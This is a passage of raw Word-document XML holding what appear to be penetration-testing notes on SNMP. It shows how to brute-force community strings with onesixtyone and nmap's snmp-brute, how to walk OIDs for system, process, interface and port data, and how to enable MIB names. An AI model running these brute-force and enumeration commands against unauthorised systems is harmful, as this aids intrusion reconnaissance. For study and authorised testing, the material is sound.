    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Onesixtyone:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">onesixtyone -c community.txt &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000318F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1246"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> community.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a wordlist of common community strings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003190">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003191">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003192">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap with snmp-brute:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003193">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003194">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sU -p 161 --script snmp-brute &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003195">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003196">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Enumerate Using SNMPwalk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003197">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003198">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have the correct community string, enumerate detailed information using snmpwalk:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003199">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319A">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v2c -c &lt;community&gt; &lt;target-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;community&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> with the discovered community string.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1202"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-v2c </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">specifies SNMP version 2c for better features.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Key information to look for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000319F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System Info:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v2c -c &lt;community&gt; &lt;target-ip&gt; 1.3.6.1.2.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="460"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This retrieves system details like hostname, OS version, and uptime.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Network Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v2c -c &lt;community&gt; &lt;target-ip&gt; 1.3.6.1.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1010"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists network interfaces, IPs, and MAC addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Running Processes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031A9">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v2c -c &lt;community&gt; &lt;target-ip&gt; 1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1405"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerates running processes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">snmpwalk -v2c -c &lt;community&gt; &lt;target-ip&gt; 1.3.6.1.2.1.6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lists open TCP ports.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_luxolg1f5087" w:id="441"/>
      <w:bookmarkEnd w:id="441"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to enable HOST-RESOURCES-MIB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HOST-RESOURCES-MIB are just symbolic names so that you don't have to use the numeric OID, since the HOST-RESOURCES-MIB are in words rather than numbers. For example, these two are the same:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HOST-RESOURCES-MIB::hrSWRunName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="389"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.3.6.1.2.1.25.4.2.1.2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To install it, do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031B8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>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31B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install snmp-mibs-downloader</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo subl /etc/snmp/snmp.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1272"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To edit the file in sublime text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then comment out the line "mib:"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1272"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4859838" cy="1954839"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51" name="image57.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image57.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1100"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4859838" cy="1954839"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1272"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Comment it out as such</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1272"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now you are able to use the HOST-RESOURCES-MIB AND the numeric OID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000031C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
